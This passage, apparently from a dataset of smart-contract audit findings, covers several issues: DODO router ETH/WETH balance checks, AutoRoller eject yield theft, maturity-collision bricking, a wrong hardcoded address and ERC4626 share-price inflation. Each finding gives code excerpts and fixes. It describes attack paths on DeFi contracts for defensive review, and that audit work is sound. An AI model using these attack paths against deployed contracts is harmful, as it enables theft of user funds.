memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nIf the fromToken is _ETH_ADDRESS, we send the user supplied fromTokenAmount without verifying that the fromTokenAmount.\\nFinally, we use the before and after balance to get the amount with received.\\n```\\n// calculate toToken amount\\n if(toToken != _ETH_ADDRESS_) {\\n receiveAmount = IERC20(toToken).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n } else {\\n receiveAmount = IERC20(_WETH_).universalBalanceOf(address(this)) - (\\n toTokenOriginBalance\\n );\\n }\\n```\\n\\nWe are checking the WETH amount instead of ETH amount again.\\nThe issue is that some trades may settle the trade in native ETH, for example\\nwe can look into the Paraswap contract\\nIf we click the implementation contract and see the method swapOnUniswapV2Fork\\nCode line 927 - 944, which calls the function\\n```\\nfunction swapOnUniswapV2Fork(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] calldata pools\\n)\\n external\\n payable\\n{\\n _swap(\\n tokenIn,\\n amountIn,\\n amountOutMin,\\n weth,\\n pools\\n );\\n}\\n```\\n\\nwhich calls:\\n```\\n function _swap(\\n address tokenIn,\\n uint256 amountIn,\\n uint256 amountOutMin,\\n address weth,\\n uint256[] memory pools\\n )\\n private\\n returns (uint256 tokensBought)\\n {\\n uint256 pairs = pools.length;\\n\\n require(pairs != 0, ""At least one pool required"");\\n\\n bool tokensBoughtEth;\\n\\n if (tokenIn == ETH_IDENTIFIER) {\\n require(amountIn == msg.value, ""Incorrect msg.value"");\\n IWETH(weth).deposit{value: msg.value}();\\n require(IWETH(weth).transfer(address(pools[0]), msg.value));\\n } else {\\n require(msg.value == 0, ""Incorrect msg.value"");\\n transferTokens(tokenIn, msg.sender, address(pools[0]), amountIn);\\n tokensBoughtEth = weth != address(0);\\n }\\n\\n tokensBought = amountIn;\\n\\n for (uint256 i = 0; i < pairs; ++i) {\\n uint256 p = pools[i];\\n address pool = address(p);\\n bool direction = p & 
DIRECTION_FLAG == 0;\\n\\n tokensBought = NewUniswapV2Lib.getAmountOut(\\n tokensBought, pool, direction, p FEE_OFFSET\\n );\\n (uint256 amount0Out, uint256 amount1Out) = direction\\n ? (uint256(0), tokensBought) : (tokensBought, uint256(0));\\n IUniswapV2Pair(pool).swap(\\n amount0Out,\\n amount1Out,\\n i + 1 == pairs\\n ? (tokensBoughtEth ? address(this) : msg.sender)\\n : address(pools[i + 1]),\\n """"\\n );\\n }\\n\\n if (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n }\\n\\n require(tokensBought >= amountOutMin, ""UniswapV2Router: INSUFFICIENT_OUTPUT_AMOUNT"");\\n }\\n```\\n\\nas can clearly see, the code first receive ETH, wrap ETH to WETH, then instead end, unwrap the WETH to ETH and the send the ETH back to complete the trade.\\n```\\nif (tokensBoughtEth) {\\n IWETH(weth).withdraw(tokensBought);\\n TransferHelper.safeTransferETH(msg.sender, tokensBought);\\n}\\n```\\n\\nIn DODORouterProxy.sol#ExternalSwap however, we are using WETH balance before and after to check the received amount,\\nbut if we call swapOnUniswapV2Fork on Paraswap router, the balance change for WETH would be 0\\nbecause as we see above, the method on paraswap side wrap ETH to WETH but in the end unwrap WETH and send ETH back.\\nThere is also a lack of a method to wrap the ETH to WETH before the trade. 
making the ETH-related order not tradeable.","We recommend the project change from\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n\\n```\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_ETH_ADDRESS).universalBalanceOf(address(this));\\n }\\n```\\n\\nIf we want to use WETH to do the balance check, we can help the user wrap the ETH to WETH by calling before do the balance check.\\n```\\nIWETH(_WETH_).deposit(receiveAmount);\\n```\\n\\nIf we want to use WETH as the reference to trade, we also need to approve external contract to spend our WETH.\\nWe can add\\n```\\nif(fromToken == _ETH_ADDRESS) {\\n IERC20(_WETH_).universalApproveMax(approveTarget, fromTokenAmount);\\n}\\n```\\n\\nWe also need to verify the fromTokenAmount for\\n```\\n(bool success, bytes memory result) = swapTarget.call{\\n value: fromToken == _ETH_ADDRESS_ ? 
fromTokenAmount : 0\\n}(callDataConcat);\\n```\\n\\nwe can add the check:\\n```\\nrequire(msg.value == fromTokenAmount, ""invalid ETH amount"");\\n```\\n",A lot of method that does not use WETH to settle the trade will not be callable.,"```\\n function externalSwap(\\n address fromToken,\\n address toToken,\\n address approveTarget,\\n address swapTarget,\\n uint256 fromTokenAmount,\\n uint256 minReturnAmount,\\n bytes memory feeData,\\n bytes memory callDataConcat,\\n uint256 deadLine\\n ) external payable judgeExpired(deadLine) returns (uint256 receiveAmount) { \\n require(isWhiteListedContract[swapTarget], ""DODORouteProxy: Not Whitelist Contract""); \\n require(isApproveWhiteListedContract[approveTarget], ""DODORouteProxy: Not Whitelist Appprove Contract""); \\n\\n // transfer in fromToken\\n if (fromToken != _ETH_ADDRESS_) {\\n // approve if needed\\n if (approveTarget != address(0)) {\\n IERC20(fromToken).universalApproveMax(approveTarget, fromTokenAmount);\\n }\\n\\n IDODOApproveProxy(_DODO_APPROVE_PROXY_).claimTokens(\\n fromToken,\\n msg.sender,\\n address(this),\\n fromTokenAmount\\n );\\n }\\n\\n // swap\\n uint256 toTokenOriginBalance;\\n if(toToken != _ETH_ADDRESS_) {\\n toTokenOriginBalance = IERC20(toToken).universalBalanceOf(address(this));\\n } else {\\n toTokenOriginBalance = IERC20(_WETH_).universalBalanceOf(address(this));\\n }\\n```\\n" +AutoRoller#eject can be used to steal all the yield from vault's YTs,high,"AutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. 
Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via 
divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? 
tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.",Combine returns the amount of target yielded by combining the PT and YT. This balance is the amount of assets that should be transferred to the user.,User funds given to the wrong person,"```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 
0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n" +Adversary can brick AutoRoller by creating another AutoRoller on the same adapter,high,"onSponsorWindowOpened attempts to make a new series at the desired maturity. Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. 
Since the maturity now exists, the first AutoRoller will always revert when trying to Roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested months ahead, truncated down to the first of the month. It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address 
pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exist then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months. Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.",Requiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. 
It seems like a large refactoring is needed for the rolling section of the AutoRoller,AutoRollers will frequently be bricked,"```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n" +Hardcoded divider address in RollerUtils is incorrect and will brick autoroller,medium,"RollerUtils uses a hard-coded constant for the Divider. This address is incorrect and will cause a revert when trying to call AutoRoller#cooldown. If the adapter is combineRestricted then LPs could potentially be unable to withdraw or eject.\\n```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n\\nRollerUtils uses a hardcoded constant DIVIDER to store the Divider address. There are two issues with this. The most pertinent issue is that the current address used is not the correct mainnet address. The second is that if the divider is upgraded, changing the address of the RollerUtils may be forgotten.\\n```\\n (, uint48 prevIssuance, , , , , uint256 iscale, uint256 mscale, ) = DividerLike(DIVIDER).series(adapter, prevMaturity);\\n```\\n\\nWith an incorrect address the divider#series call will revert causing RollerUtils#getNewTargetedRate to revert, which is called in AutoRoller#cooldown. The result is that the AutoRoller cycle can never be completed. LP will be forced to either withdraw or eject to remove their liquidity. Withdraw only works to a certain point because the AutoRoller tries to keep the target ratio. After which the eject would be the only way for LPs to withdraw. During eject the AutoRoller attempts to combine the PT and YT. 
If the adapter is also combineRestricted then there is no longer any way for the LPs to withdraw, causing loss of their funds.",RollerUtils DIVIDER should be set by constructor. Additionally RollerUtils should be deployed by the factory constructor to make sure they always have the same immutable divider reference.,Incorrect hard-coded divider address will brick autorollers for all adapters and will cause loss of funds for combineRestricted adapters,```\\naddress internal constant DIVIDER = 0x09B10E45A912BcD4E80a8A3119f0cfCcad1e1f12;\\n```\\n +AutoRoller#eject can be used to steal all the yield from vault's YTs,high,"AutoRoller#eject collects all the current yield of the YTs, combines the users share of the PTs and YTs then sends the user the entire target balance of the contract. The problem is that combine claims the yield for ALL YTs, which sends the AutoRoller target assets. Since it sends the user the entire target balance of the contract it accidentally sends the user the yield from all the pool's YTs.\\n```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 
0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n\\nEject allows the user to leave the liquidity pool by withdrawing their liquidity from the Balancer pool and combining the PTs and YTs via divider.combine.\\n```\\nfunction combine(\\n address adapter,\\n uint256 maturity,\\n uint256 uBal\\n) external nonReentrant whenNotPaused returns (uint256 tBal) {\\n if (!adapterMeta[adapter].enabled) revert Errors.InvalidAdapter();\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n uint256 level = adapterMeta[adapter].level;\\n if (level.combineRestricted() && msg.sender != adapter) revert Errors.CombineRestricted();\\n\\n // Burn the PT\\n Token(series[adapter][maturity].pt).burn(msg.sender, uBal);\\n\\n //@audit call of interest\\n uint256 collected = _collect(msg.sender, adapter, maturity, uBal, uBal, address(0));\\n\\n // rest of code\\n\\n // Convert from units of Underlying to units of Target\\n tBal = uBal.fdiv(cscale);\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, msg.sender, tBal);\\n\\n // Notify only when Series is not settled as when it is, the _collect() call 
above would trigger a _redeemYT which will call notify\\n if (!settled) Adapter(adapter).notify(msg.sender, tBal, false);\\n unchecked {\\n // Safety: bounded by the Target's total token supply\\n tBal += collected;\\n }\\n emit Combined(adapter, maturity, tBal, msg.sender);\\n}\\n```\\n\\n```\\nfunction _collect(\\n address usr,\\n address adapter,\\n uint256 maturity,\\n uint256 uBal,\\n uint256 uBalTransfer,\\n address to\\n) internal returns (uint256 collected) {\\n if (!_exists(adapter, maturity)) revert Errors.SeriesDoesNotExist();\\n\\n if (!adapterMeta[adapter].enabled && !_settled(adapter, maturity)) revert Errors.InvalidAdapter();\\n\\n Series memory _series = series[adapter][maturity];\\n uint256 lscale = lscales[adapter][maturity][usr];\\n\\n // rest of code\\n\\n uint256 tBalNow = uBal.fdivUp(_series.maxscale); // preventive round-up towards the protocol\\n uint256 tBalPrev = uBal.fdiv(lscale);\\n unchecked {\\n collected = tBalPrev > tBalNow ? tBalPrev - tBalNow : 0;\\n }\\n\\n //@audit adapter.target is transferred to AutoRoller\\n ERC20(Adapter(adapter).target()).safeTransferFrom(adapter, usr, collected);\\n Adapter(adapter).notify(usr, collected, false); // Distribute reward tokens\\n\\n // rest of code\\n}\\n```\\n\\nInside divider#combine the collected yield from the YTs are transferred to the AutoRoller. The AutoRoller balance will now contain both the collected yield of the YTs and the target yielded by combining. The end of eject transfers this entire balance to the caller, effectively stealing the yield of the entire AutoRoller.",Combine returns the amount of target yielded by combining the PT and YT. 
This balance is the amount of assets that should be transferred to the user.,User funds given to the wrong person,"```\\nfunction eject(\\n uint256 shares,\\n address receiver,\\n address owner\\n) public returns (uint256 assets, uint256 excessBal, bool isExcessPTs) {\\n\\n // rest of code\\n\\n //@audit call of interest\\n (excessBal, isExcessPTs) = _exitAndCombine(shares);\\n\\n _burn(owner, shares); // Burn after percent ownership is determined in _exitAndCombine.\\n\\n if (isExcessPTs) {\\n pt.transfer(receiver, excessBal);\\n } else {\\n yt.transfer(receiver, excessBal);\\n }\\n\\n //@audit entire asset (adapter.target) balance transferred to caller, which includes collected YT yield and combined\\n asset.transfer(receiver, assets = asset.balanceOf(address(this)));\\n\\n emit Ejected(msg.sender, receiver, owner, assets, shares,\\n isExcessPTs ? excessBal : 0,\\n isExcessPTs ? 0 : excessBal\\n );\\n}\\n\\nfunction _exitAndCombine(uint256 shares) internal returns (uint256, bool) {\\n uint256 supply = totalSupply; // Save extra SLOAD.\\n\\n uint256 lpBal = shares.mulDivDown(space.balanceOf(address(this)), supply);\\n uint256 totalPTBal = pt.balanceOf(address(this));\\n uint256 ptShare = shares.mulDivDown(totalPTBal, supply);\\n\\n // rest of code\\n\\n uint256 ytBal = shares.mulDivDown(yt.balanceOf(address(this)), supply);\\n ptShare += pt.balanceOf(address(this)) - totalPTBal;\\n\\n unchecked {\\n // Safety: an inequality check is done before subtraction.\\n if (ptShare > ytBal) {\\n\\n //@audit call of interest\\n divider.combine(address(adapter), maturity, ytBal);\\n return (ptShare - ytBal, true);\\n } else { // Set excess PTs to false if the balances are exactly equal.\\n divider.combine(address(adapter), maturity, ptShare);\\n return (ytBal - ptShare, false);\\n }\\n }\\n}\\n```\\n" +Adversary can brick AutoRoller by creating another AutoRoller on the same adapter,high,"onSponsorWindowOpened attempts to make a new series at the desired maturity. 
Each adapter can only have one of each maturity. If the maturity requested already exists then onSponsorWindowOpened will revert, making it impossible to roll the AutoRoller. An adversary can take advantage of this to brick an AutoRoller by creating a second AutoRoller on the same adapter that will create a target maturity before the first AutoRoller. Since the maturity now exists, the first AutoRoller will always revert when trying to roll.\\n```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n\\nInside AutoRoller#onSponsorWindowOpened the maturity is calculated using RollerUtils#getFutureMaturity. This returns the timestamp the requested number of months ahead, truncated down to the first of the month.
It passes this calculated maturity as the maturity to sponsor a new series.\\n```\\n(ERC20 _pt, YTLike _yt) = periphery.sponsorSeries(address(adapter), _maturity, true);\\n```\\n\\n```\\nfunction sponsorSeries(\\n address adapter,\\n uint256 maturity,\\n bool withPool\\n) external returns (address pt, address yt) {\\n (, address stake, uint256 stakeSize) = Adapter(adapter).getStakeAndTarget();\\n\\n // Transfer stakeSize from sponsor into this contract\\n ERC20(stake).safeTransferFrom(msg.sender, address(this), stakeSize);\\n\\n // Approve divider to withdraw stake assets\\n ERC20(stake).approve(address(divider), stakeSize);\\n\\n (pt, yt) = divider.initSeries(adapter, maturity, msg.sender);\\n\\n // Space pool is always created for verified adapters whilst is optional for unverified ones.\\n // Automatically queueing series is only for verified adapters\\n if (verified[adapter]) {\\n poolManager.queueSeries(adapter, maturity, spaceFactory.create(adapter, maturity));\\n } else {\\n if (withPool) {\\n spaceFactory.create(adapter, maturity);\\n }\\n }\\n emit SeriesSponsored(adapter, maturity, msg.sender);\\n}\\n```\\n\\nperiphery#sponsorSeries is called with true indicating to create a space pool for the newly created series.\\n```\\nfunction create(address adapter, uint256 maturity) external returns (address pool) {\\n address pt = divider.pt(adapter, maturity);\\n _require(pt != address(0), Errors.INVALID_SERIES);\\n _require(pools[adapter][maturity] == address(0), Errors.POOL_ALREADY_EXISTS);\\n\\n pool = address(new Space(\\n vault,\\n adapter,\\n maturity,\\n pt,\\n ts,\\n g1,\\n g2,\\n oracleEnabled\\n ));\\n\\n pools[adapter][maturity] = pool;\\n}\\n```\\n\\nWe run into an issue inside SpaceFactory#create because it only allows a single pool per adapter/maturity. If a pool already exists then it will revert.\\nAn adversary can abuse this revert to brick an existing AutoRoller. Assume AutoRoller A has a duration of 3 months.
Its current maturity is December 1st 2022, when rolled it will attempt to create a series at March 1st 2023. An adversary could abuse this and create AutoRoller B with a maturity of 4 months. When they roll for the first time it will create a series with maturity at March 1st 2023. When AutoRoller A attempts to roll it will revert since a series already exists at March 1st 2023.\\nThis conflict can happen accidentally if there is a monthly AutoRoller and a quarterly AutoRoller. It also hinders the viability of using an AutoRoller for an adapter that is popular because the series will likely have been created by the time the autoroller tries to roll into it.",Requiring that the AutoRoller has to create the series seems overly restrictive and leads to a large number of issues. Attempting to join an a series that is already initialized could also lead to pool manipulation rates. It seems like a large refactoring is needed for the rolling section of the AutoRoller,AutoRollers will frequently be bricked,"```\\nuint256 _maturity = utils.getFutureMaturity(targetDuration);\\n\\nfunction getFutureMaturity(uint256 monthsForward) public view returns (uint256) {\\n (uint256 year, uint256 month, ) = DateTime.timestampToDate(DateTime.addMonths(block.timestamp, monthsForward));\\n return DateTime.timestampFromDateTime(year, month, 1 /* top of the month */, 0, 0, 0);\\n}\\n```\\n" +Public vault : Initial depositor can manipulate the price per share value and future depositors are forced to deposit huge value in vault.,high,"Most of the share based vault implementation will face this issue. The vault is based on the ERC4626 where the shares are calculated based on the deposit value. By depositing large amount as initial deposit, initial depositor can influence the future depositors value.\\nBy depositing large amount as initial deposit, first depositor can take advantage over other depositors.\\nI am sharing reference for this type of issue that already reported and acknowledged. 
This explain how the share price could be manipulated to large value.\\nERC4626 implementation function mint(uint256 shares, address receiver) public virtual returns (uint256 assets) { assets = previewMint(shares); // No need to check for rounding error, previewMint rounds up.\\n```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n","Consider requiring a minimal amount of share tokens to be minted for the first minter, and send a portion of the initial mints as a reserve to the DAO/ burn so that the price per share can be more resistant to manipulation.",Future depositors are forced for huge value of asset to deposit. It is not practically possible for all the users. This could directly affect on the attrition of users towards this system.,"```\\n // Need to transfer before minting or ERC777s could reenter.\\n asset.safeTransferFrom(msg.sender, address(this), assets);\\n\\n _mint(receiver, shares);\\n\\n emit Deposit(msg.sender, receiver, assets, shares);\\n\\n afterDeposit(assets, shares);\\n}\\n\\n function previewMint(uint256 shares) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? 
shares : shares.mulDivUp(totalAssets(), supply);\\n}\\n```\\n" +Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.,medium,"Math rounding in AutoRoller.sol is not ERC4626-complicant: previewWithdraw should round up.\\nFinally, ERC-4626 Vault implementers should be aware of the need for specific, opposing rounding directions across the different mutable and view methods, as it is considered most secure to favor the Vault itself during calculations over its users:\\nIf (1) it's calculating how many shares to issue to a user for a certain amount of the underlying tokens they provide or (2) it's determining the amount of the underlying tokens to transfer to them for returning a certain amount of shares, it should round down. If (1) it's calculating the amount of shares a user has to supply to receive a given amount of the underlying tokens or (2) it's calculating the amount of underlying tokens a user has to provide to receive a certain amount of shares, it should round up.\\nThen previewWithdraw in AutoRoller.sol should round up.\\nThe original implementation for previewWithdraw in Solmate ERC4626 is:\\n```\\n function previewWithdraw(uint256 assets) public view virtual returns (uint256) {\\n uint256 supply = totalSupply; // Saves an extra SLOAD if totalSupply is non-zero.\\n\\n return supply == 0 ? assets : assets.mulDivUp(supply, totalAssets());\\n }\\n```\\n\\nIt is rounding up, however in the implementation of the AutoRoller.sol#previewWith is not round up.\\n```\\nfor (uint256 i = 